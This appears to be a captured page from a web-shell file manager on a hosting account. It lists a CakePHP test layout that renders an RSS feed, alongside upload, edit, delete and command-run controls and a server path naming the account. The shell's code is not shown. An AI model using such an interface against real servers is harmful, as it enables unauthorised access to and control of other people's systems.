/
home
/
desid573
/
public_html
/
family
/
pdd
/
lib
/
Cake
/
Test
/
test_app
/
View
/
Layouts
/
rss
/
/home/desid573/public_html/family/pdd/lib/Cake/Test/test_app/View/Layouts/rss
mkdir
upload
Name
Size
Mode
Actions
default.ctp
260
0644
edit
dl
rm
Edit:
/home/desid573/public_html/family/pdd/lib/Cake/Test/test_app/View/Layouts/rss/default.ctp
(260B)
<?php echo $this->Rss->header(); if (!isset($channel)) { $channel = array(); } if (!isset($channel['title'])) { $channel['title'] = $this->fetch('title'); } echo $this->Rss->document( $this->Rss->channel( array(), $channel, $this->fetch('content') ) );
Save
cmd:
run